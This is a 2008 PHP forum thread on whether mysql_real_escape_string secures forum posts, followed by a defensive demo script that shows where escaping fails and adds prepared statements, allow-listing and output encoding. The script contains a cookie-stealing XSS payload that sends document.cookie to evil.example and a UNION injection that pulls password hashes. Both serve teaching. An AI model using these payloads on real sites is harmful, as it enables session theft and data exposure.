
Securing input in a textarea (forum)

Posted: Sun Aug 03, 2008 11:34 pm
by Demiloy
Right now I'm making a forum (not so much to try to challenge phpBB or anything like that, but to gain experience). So, when someone posts a new topic or post, I run it through mysql_real_escape_string, and then put it straight into the MySQL database. But I'm wondering, is there any other potentially harmful thing an attacker could do, even after escaping the string?

Re: Securing input in a textarea (forum)

Posted: Mon Aug 04, 2008 1:43 am
by jaoudestudios
That should be fine, make sure you use it on all PHP variables in the query.

Re: Securing input in a textarea (forum)

Posted: Mon Aug 04, 2008 4:38 am
by jaoudestudios

Re: Securing input in a textarea (forum)

Posted: Tue Aug 05, 2008 10:44 am
by alex.barylski
Define potentially harmful...that is very subjective and if I said NO someone would likely counter argue, so I'll say maybe. :P

If you properly escape the incoming data...it will prevent anyone from executing a SQLi attack but that is about it.

You do not mention anything about filtering so that might be exploited for XSS.

Validation is another link in the security chain.

Whether you consider any of the number of exploits or problems actually problems or just minor setbacks is really subjective.

Personally I don't filter *everything*, for example an email address. I do, however, have a sophisticated RFC validation routine I run against email input, and if it fails it's only because the email isn't valid according to the RFC, so in this case filtering would be redundant.

A message post on the other hand...is probably very difficult to validate (given the arbitrary nature of user text) so you are probably better off filtering and removing harmful tags, attributes, etc.

Re: Securing input in a textarea (forum)

Posted: Fri Aug 08, 2008 4:43 am
by Mordred
There are cases when escaping is not enough: http://www.logris.org/security/the-unex ... -injection
Don't forget to pay attention to the other code in the forum: searching and sorting in particular open possibilities for failures like the ones described in the above paper.
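The two points made above (escaping only covers the quoted-string context, and SQL escaping does nothing for XSS) in one runnable script. This is an added example, not code from any poster in this thread. It assumes PDO with an in-memory SQLite database as a stand-in for MySQL, and a tiny `escape()` function (quote doubling, the SQLite dialect) as a stand-in for mysql_real_escape_string(); the escaping rules differ between the two databases, the lesson does not. All table names, rows and attacker inputs are constructed for the demonstration.

```php
<?php
// Added example: where mysql_real_escape_string-style escaping helps, where it
// cannot, and what to do instead. SQLite via PDO stands in for MySQL.

// Stand-in for mysql_real_escape_string(): neutralises a quote inside a
// quoted string literal and nothing else. (SQLite doubles the quote; MySQL
// backslash-escapes it. Same job, same limits.)
function escape(string $s): string
{
    return str_replace("'", "''", $s);
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pw_hash TEXT)');
$db->exec('CREATE TABLE posts (id INTEGER PRIMARY KEY, author TEXT, body TEXT)');
$db->exec("INSERT INTO users VALUES (1, 'admin', 'hash-of-admin-password')"); // constructed row

// (1) Quoted string context: escaping does its job. The apostrophes in the
//     post cannot end the literal early, so the body is stored exactly as typed,
//     script tag and all. Nothing about the SQL layer makes that text safe to show.
$body = "It's easy: <script>location='http://evil.example/?c='+document.cookie</script>";
$db->exec("INSERT INTO posts (author, body) VALUES ('mallory', '" . escape($body) . "')");

// (2) Unquoted context (a post id from ?id=, a LIMIT, an ORDER BY column):
//     there is no quote for escape() to touch, so the value is spliced in as SQL.
$id = '0 UNION SELECT id, name, pw_hash FROM users'; // attacker-supplied ?id=
$vulnerable = 'SELECT id, author, body FROM posts WHERE id = ' . escape($id);
foreach ($db->query($vulnerable) as $row) {
    echo "vulnerable query returned: {$row['author']} / {$row['body']}\n";
}

// Fix for values: bind them. The whole string is compared against the column
// as data, so the UNION is never parsed as SQL.
$stmt = $db->prepare('SELECT id, author, body FROM posts WHERE id = ?');
$stmt->execute([$id]);
echo 'prepared statement returned ' . count($stmt->fetchAll()) . " rows\n";

// Fix for identifiers (sort column, direction): neither escaping nor binding
// applies, so map the request onto an allow-list and ignore anything else.
$sortable  = ['id' => 'id', 'author' => 'author'];
$requested = 'pw_hash';                           // attacker-supplied ?sort=
$orderBy   = $sortable[$requested] ?? 'id';

// (3) Output: the database faithfully returns what was stored, so the XSS
//     defence belongs at render time. Encode for the HTML context every time.
foreach ($db->query("SELECT author, body FROM posts ORDER BY $orderBy") as $row) {
    echo '<p><b>' . htmlspecialchars($row['author'], ENT_QUOTES, 'UTF-8') . '</b>: '
       . htmlspecialchars($row['body'], ENT_QUOTES, 'UTF-8') . "</p>\n";
}
```

Run it and the "vulnerable query" line prints the admin's stored hash as if it were a post body, the prepared statement finds zero rows for the same input, the sort request for `pw_hash` silently falls back to `id`, and the rendered post shows the script tag as literal text. If you keep mysql_real_escape_string for string values, the unquoted cases in (2) are the ones to go looking for in your search and sorting code.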